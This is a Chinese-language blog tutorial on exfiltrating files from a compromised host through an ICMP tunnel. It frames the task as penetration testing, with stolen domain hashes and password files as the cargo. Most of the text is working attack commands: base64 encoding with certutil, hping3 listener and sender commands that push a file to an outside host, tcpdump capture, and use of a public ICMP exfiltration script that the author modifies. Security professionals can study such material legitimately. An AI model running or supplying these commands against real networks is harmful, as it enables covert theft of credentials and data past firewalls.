icmp隧道手工操作

ICMP协议被用于检测网络连通状态的协议，通常情况下，防火墙会默认放过该协议。

渗透测试中经常出现一种情况是，我们通过某一种方式取得了一台主机的权限，得到了一些文件，比如域hash，密码文件之类的东西，需要回传至本地进行破解，但是防火墙阻断了由内网发起请求的协议，只有icmp没有被阻断，而我们又需要回传文件，这个时候就可以利用icmp隧道来进行传输。

【基本步骤】如下：

（1)、将所要传输的文件进行base64编码：windows下可以用certutil命令;linux可以用base64命令

（2）、在远程主机监听并转储icmp数据包：常用的工具有tcpdump、wireshark

（3）、通过可以构造icmp数据包的工具对我们的远程主机发送icmp数据包：常用的工具有hping3，或者自己python写一个

（4）对收到的icmp包提取data数据段内容，进行拼接，重新进行base64解码，得到源文件

我这里在linux下使用hping3 和wireshark来手动实现，文章结尾会再引用以为大神写的几个脚本工具来快速复现一次

1、将我们要传输的文件进行base64编码：

base64 XXX>test　　　　　　　　　　　　　 #linux

certutil -encode test.zip temp　　　　#windows
#-encode  base64编码
#test.zip   要加密的文件
#temp      生成的base64编码文件

2、在接收的远程主机上输入下面的命令监听接收的数据，并开启wireshark，并设置过滤策略为只监听icmp

hping3 x.x.x.x --listen signature --safe --icmp -u

参数说明：

（1）--listen  　　指定hping3为监听模式，接收发来的数据

（2）signature　 指定接收数据的签名，每条发来的数据都会在最前面带上这个字符串，也就是说，“signature”这个字符串后就是我们接受到的数据，后面拼接是要用到

（3）--safe　　　以安全模式接收，确保发来的数据包是按照发送顺序，完整的接收到

（4）--icmp　　  指定通过icmp协议传输

（5）-u　　　　　接收完成后自动中断（官方资料如是说，但是我这里没有达到这个效果）

（6）x.x.x.x　　 是我们指定的需要接收的地址，也就是表明：我们只接收来自192.168.164.128发来的icmp数据包

3、在发送方执行下面的命令，来通过icmp数据包发送文件

sudo hping3 192.168.164.136 --icmp -d  --sign signature --file test -u

参数说明：（与上面重复的不在说明）

（1）x.x.x.x　　　　　　指定我们要发送给那个主机

（2）-d　　　　　　 　　指定每个数据包的大小

（3）--sign signature　 指定签名内容，也就是上一步我们需要接收的签名字符串为"signature"

（4）--file test　　　　  指定我们要传输的文件为test文件，也就是我们进行base64编码后的编码文件

*按理说，应该也可以用--safe参数的，但是我这里用--safe后，目的地址就变成了127.0.0.1，不知道怎们回事，暂且不用

加了-u参数后，文件发送完成，它会提示我们按下ctrl+c来停止传送，如果不停止，它会反复发送

4、在接收端wireshark已经可以看到接受到的数据包

这里由于测试，我们的文件比较短，直接提取data中text类型中的字符串，右键->copy->value就可以取到

由于我们取到的值进行了签名，就是前面的“signature”字符串，我们直接去掉这个字符串，只保留后面的base64编码，保存为temp

5、在接收端执行解码命令还原文件

cat temp|base64 -d>test　　　　　　 #linux

certutil -decode temp test.zip　　#windows
#-decode  base64编码
#temp      要解密的base64编码文件
#test.zip   生还原的文件

可以看到已经对文件进行了还原，是一个zip文件。

传输完成

【引用】

接下来，我在这里引用两篇文章，是一位大神写了一个python工具，来实现了icmp隧道传输，十分值得借鉴，两篇文章用的是同一种方法和工具，一篇偏重渗透思路，另一篇主要是对工具的总结，内容上有重合部分，可以借鉴

我稍微总结下具体的工具使用，详细的可以去看这两篇文章

工具：icmp_tunnel_ex_filtrate-master：https://github.com/NotSoSecure/icmp_tunnel_ex_filtrate

1、在接收机器上运行tcpdump监听并接收icmp数据包

tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -XX -vvv -w output.txt

参数说明：

（1）-i eth0　　　　　　　　　　　　　　　　　　　　　　　　　　　 指定监听的网卡

（2）icmp and icmp[icmptype]=icmp-echo -XX -vvv　　　　　　   监听策略，过滤出icmp数据包

（3）-w output.txt　　　　　　　　　　　　　　　　　　　　　　　　指定输出文件为output.txt

2、通过下面的命令运行工具脚本，发送文件，它会自动转换为base64编码发送

sudo python icmp_transmitter.py test x.x.x.x

参数说明：

（1）test:　　　　我们要发送的文件

（2）x.x.x.x:　　 指定要发送给哪个主机的ip

注：原来这个工具是windows下的，用了certutil进行了编码，由于我这里用的linux，所以对他的代码进行了些许修改，即把原来init函数中的

os.system("certutil -encode  "+ file +" test.txt")
改为了
os.system("base64  "+ file +" > test.txt")

使用windows的同学就不用改了

3、我们在接收端应该可以看到接收到了信息

按ctrl+c停止监听，然后按照parser.sh文件中的命令对output.txt文件处理，就可以得到base64文件了，然后按照上面的步骤进行解码就可以了

生成的transmitted.txt就是文件base64的编码了

已经还原出我要传输的文件了

大神的这个脚本还是蛮厉害的，而且大神是在windows环境下用的，还把python脚本用py2exe模块处理成了exe文件，可以看到只需稍微修改就可以运用于各种环境

*按理说这个sh文件应该可以直接执行的，不知道怎么的，我再linux下，需要手工输入才可以，脚本直接运行会报错，不能生成output1.txt文件，可能我的环境变量有问题吧

【文章】：

（1）偏渗透思路

https://m.baidu.com/from=1014517c/bd_page_type=1/ssid=0/uid=0/baiduid=BF1E191B8AC484726DC1308DF0E37D18/w=0_10_/t=zbios/l=3/tc?ref=www_zbios&pu=sz%401320_480%2Ccuid%40la24aj8cB80Quvak_ivT8jOqvt0qO2aJgiHiugPq2i8ia-8ggav4i_u3viYua2fHA%2Ccua%40_a-qi4aqBig4NE65I5me6NI0-I_UCvC5SdNqA%2Ccut%4009STI0tc2i4jaXiDyavdC5kcSMzWtpBsB%2Cosname%40baiduboxapp%2Cctv%402%2Ccfrom%401014517c%2Ccen%40cuid_cua_cut%2Ccsrc%40browserf_box_txt%2Cta%40zbios_2_7.0_6_8.3%2Cusm%401%2Cvmgdb%400020100228y&lid=10256142585042083616&order=2&fm=alop&tj=www_normal_2_0_10_title&vit=osres&m=8&srd=1&cltj=cloud_title&asres=1&nt=wnor&title=%E6%A1%88%E4%BE%8B%E5%AD%A6%E4%B9%A0%3A%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87ICMPtunnel%E8%8E%B7%E5%8F%96%E6%9C%AA%E8%BF%87%E6%BB%A4%E6%95%B0%E6%8D%AE-%E7%BD%91%E7%AB%99...&dict=20&w_qd=IlPT2AEptyoA_ykwv4op6AQ6vAfHtn-inklisxezdeJc&sec=19931&di=2ce50d030f985362&bdenc=1&tch=124.0.304.189.0.0&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IEQGG_yFB_jexppjfxP4kHREsRF0hRH_ZH5CwdoSGdMJRtXLR0HEobxpOrxpms7oaznuPcfTqhB7UVNBE&eqid=8e5523577b30a0001000000258dcf07c&wd=&clk_info=%7B%22srcid%22%3A%221599%22%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1490874582535%2C%22xpath%22%3A%22div-a-h3%22%7D

（2）偏工具使用

http://www.hackdig.com/09/hack-39591.htm